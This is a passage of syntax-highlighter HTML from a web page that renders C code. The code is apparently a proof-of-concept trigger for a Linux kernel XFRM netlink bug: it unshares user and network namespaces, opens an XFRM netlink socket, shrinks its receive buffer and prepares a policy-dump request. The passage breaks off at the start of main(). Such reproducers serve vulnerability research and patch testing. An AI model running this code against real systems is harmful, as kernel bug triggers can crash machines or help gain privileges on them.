data-line=\"crayon-5a2f045be6354547480509-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f045be6354547480509-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f045be6354547480509-96\">96<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-1\"><span class=\"crayon-p\">#define _GNU_SOURCE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-2\"><span class=\"crayon-p\">#include &lt;string.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-3\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-4\"><span class=\"crayon-p\">#include &lt;stdlib.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-5\"><span class=\"crayon-p\">#include &lt;asm\/types.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-6\"><span class=\"crayon-p\">#include &lt;sys\/socket.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-7\"><span class=\"crayon-p\">#include &lt;netinet\/in.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-8\"><span class=\"crayon-p\">#include &lt;arpa\/inet.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-9\"><span class=\"crayon-p\">#include &lt;linux\/netlink.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-10\"><span class=\"crayon-p\">#include &lt;linux\/xfrm.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-11\"><span class=\"crayon-p\">#include &lt;sched.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-12\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-14\"><span class=\"crayon-p\">#define BUFSIZE 2048<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-17\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-18\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_nl <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-20\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr <\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">BUFSIZE<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-23\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-25\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-26\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PF_NETLINK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SOCK_RAW<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">NETLINK_XFRM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* packet goes into the kernel *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_groups<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRMNLGRP_NONE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* no need for multicast group *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-33\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-35\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-36\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SO_RCVBUF<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-40\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-42\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-43\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;malloc&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MSG_GETPOLICY<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MATCH<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MULTI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">NLM_F_REQUEST<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_seq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-60\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-61\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr *<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-62\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sendto<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sendto&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-71\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-73\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-74\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-75\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWUSER<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-76\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshare(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-77\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-79\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWNET<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-80\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshared(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-81\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-82\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-83\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-84\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-85\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-86\"><span 